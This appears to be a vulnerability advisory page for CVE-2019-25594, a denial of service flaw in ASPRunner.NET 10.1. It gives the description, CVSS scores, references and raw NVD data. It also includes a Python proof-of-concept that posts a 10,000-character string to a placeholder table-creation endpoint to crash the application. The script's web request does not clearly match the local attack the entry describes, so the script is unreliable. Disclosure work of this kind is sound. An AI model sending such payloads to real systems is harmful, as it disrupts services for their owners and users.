CVE-2019-25594

Description

ASPRunner.NET 10.1 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the table name field. Attackers can input a buffer of 10000 characters in the table name parameter during database table creation to trigger an application crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

ASPRunner.NET 10.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example, replace with actual endpoint)
target_url = "http://localhost/asprunner/create_table_page"

# Generate a payload of 10000 characters to trigger the crash
payload = "A" * 10000

# Prepare the data payload, targeting the vulnerable 'table name' field
post_data = {
    "tablename": payload,
    # Depending on the form structure, other fields may be required
}

try:
    # Send the POST request to create the table
    print("Sending malicious payload to trigger DoS...")
    response = requests.post(target_url, data=post_data)
    
    # Check response (If successful, the app might crash before responding or return 500)
    print(f"Response Status Code: {response.status_code}")
except requests.exceptions.RequestException as e:
    # Connection errors might indicate the service has crashed
    print(f"Connection failed or service crashed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25594
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25594
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25594/
[4] VulDB https://vuldb.com/cve/CVE-2019-25594
[5] https://www.exploit-db.com/exploits/46823
[6] https://www.vulncheck.com/advisories/asprunner-net-denial-of-service-via-table-name-field
[7] https://xlinesoft.com/
[8] https://xlinesoft.com/asprunnernet/download.htm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25594", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:26.220", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ASPRunner.NET 10.1 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the table name field. Attackers can input a buffer of 10000 characters in the table name parameter during database table creation to trigger an application crash."}, {"lang": "es", "value": "ASPRunner.NET 10.1 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga en el campo del nombre de la tabla. Los atacantes pueden introducir un búfer de 10000 caracteres en el parámetro del nombre de la tabla durante la creación de la tabla de la base de datos para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-807"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46823", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/asprunner-net-denial-of-service-via-table-name-field", "source": "[email protected]"}, {"url": "https://xlinesoft.com/", "source": "[email protected]"}, {"url": "https://xlinesoft.com/asprunnernet/download.htm", "source": "[email protected]"}]}}